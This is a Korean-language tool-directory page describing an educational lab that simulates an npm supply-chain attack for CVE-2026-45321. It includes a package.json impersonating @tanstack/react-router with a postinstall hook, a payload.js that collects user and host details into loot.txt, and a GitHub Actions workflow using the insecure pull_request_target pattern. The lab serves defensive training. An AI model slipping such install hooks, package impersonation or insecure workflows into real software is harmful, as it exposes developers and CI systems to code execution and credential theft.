Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-45321-Tanstack — CVE-2026-45321을 통한 npm 공급망 공격, CI/CD 남용, 설치 시 코드 실행을 시뮬레이션하는 교육용 랩입니다. 로컬 악성 패키지 배포를 통한 실습형 방어 보안 훈련. | Kitploit
도구/GitHubGitHub/7whyex/cve-2026-45321-tanstack
Vulnerability AnalysisMalware AnalysisSupply Chain SecurityLearning & EducationLabs & Practice
GitHub7whyex/cve-2026-45321-tanstack

CVE-2026-45321-Tanstack

CVE-2026-45321을 통한 npm 공급망 공격, CI/CD 남용, 설치 시 코드 실행을 시뮬레이션하는 교육용 랩입니다. 로컬 악성 패키지 배포를 통한 실습형 방어 보안 훈련.

저장소 보기
1개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Supply Chain Attack 시뮬레이션 — CVE-2026-45321 (TanStack)

npm 공급망 공격, CI/CD 악용 및 설치 시 코드 실행을 이해하기 위한 교육용 랩

면책 조항

이 프로젝트는 다음 만을 위해 만들어졌습니다:

  • 사이버 보안 학습,
  • 방어적 보안 연구,
  • 로컬 랩 시뮬레이션,
  • 공급망 공격 개념 이해.

이 프로젝트를 다음 용도로 사용하지 마세요:

  • 실제 시스템 공격,
  • 자격 증명 도용,
  • 악성 코드 배포,
  • 무단 접근,
  • 또는 기타 불법 활동.

설명

이 랩은 다음 사건들의 기본 개념을 시뮬레이션합니다:

  • CVE-2026-45321
  • TanStack npm 공급망 손상
  • GitHub Actions CI/CD 악용
  • npm 라이프사이클 스크립트 실행

시뮬레이션은 로컬에서 안전하게 수행되며 다음이 포함되지 않습니다:

  • 실제 자격 증명 도용,
  • 토큰 유출,
  • 또는 타사 서비스 손상.

랩 구조

root@kitploit:~
lab/
├── fake-repo/          # 대상 저장소 시뮬레이션
├── attacker-package/   # 악성 패키지 시뮬레이션
└── victim-project/     # 피해자 시뮬레이션

시뮬레이션 작동 방식

root@kitploit:~
Attacker Package
        ↓
npm install
        ↓
postinstall 스크립트 실행
        ↓
payload.js 자동 실행
        ↓
피해자가 설치 시 실행에 노출됨

학습 개념

  • npm 라이프사이클 훅
  • 설치 시 임의 코드 실행
  • 공급망 공격
  • CI/CD 신뢰 경계
  • 악성 npm 패키지
  • postinstall 악용
  • 의존성 손상

설치

1. 저장소 복제

root@kitploit:~
git clone https://github.com/renewablehacking/CVE-2026-45321-Tanstack.git

cd CVE-2026-45321-Tanstack

공격자 패키지 설정

2. 공격자 패키지 폴더로 이동

root@kitploit:~
cd attacker-package

3. 의존성 설치

root@kitploit:~
npm install

4. 타르볼 패키지 빌드

root@kitploit:~
npm pack

결과:

root@kitploit:~
tanstack-react-router-1.169.5.tgz

피해자 시뮬레이션

5. 피해자 프로젝트로 이동

root@kitploit:~
cd ../victim-project

6. 악성 패키지 설치

root@kitploit:~
npm install ../attacker-package/tanstack-react-router-1.169.5.tgz --foreground-scripts

출력

성공하면 다음이 나타납니다:

root@kitploit:~
=== MALICIOUS PAYLOAD EXECUTED ===

그리고 파일:

root@kitploit:~
loot.txt

이 자동으로 생성됩니다.


payload.js 예시

root@kitploit:~
const os = require('os');
const fs = require('fs');

console.log("=== MALICIOUS PAYLOAD EXECUTED ===");

const info = `
USER=${process.env.USER}
HOST=${os.hostname()}
PLATFORM=${os.platform()}
`;

console.log(info);

fs.writeFileSync("loot.txt", info);

package.json 예시

root@kitploit:~
{
  "name": "@tanstack/react-router",
  "version": "1.169.5",
  "scripts": {
    "postinstall": "node payload.js"
  }
}

CI/CD 시뮬레이션

이 프로젝트는 다음을 이해하는 데에도 사용할 수 있습니다:

  • GitHub Actions
  • pull_request_target
  • CI/CD 권한 경계
  • 의존성 실행

워크플로 예시:

root@kitploit:~
name: CI

on:
  pull_request_target:

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4

      - run: npm install

CVE-2026-45321과의 관계

시뮬레이션 랩실제 환경
attacker-package손상된 TanStack 패키지
payload.js악성 설치 프로그램
postinstall라이프사이클 훅 악용
victim-project

참조

  • https://nvd.nist.gov/vuln/detail/CVE-2026-45321
  • https://tanstack.com/blog/npm-supply-chain-compromise-postmortem
  • https://docs.npmjs.com/cli/v10/using-npm/scripts
  • https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions

교육 목적으로만 사용

이 랩은 다음에 대한 인식을 높이기 위해 만들어졌습니다:

  • 공급망 보안,
  • 의존성 보안,
  • CI/CD 보안,
  • 및 방어적 보안 연구.
도구 다운로드
피해자 개발자/CI
fake-repoGitHub Actions 파이프라인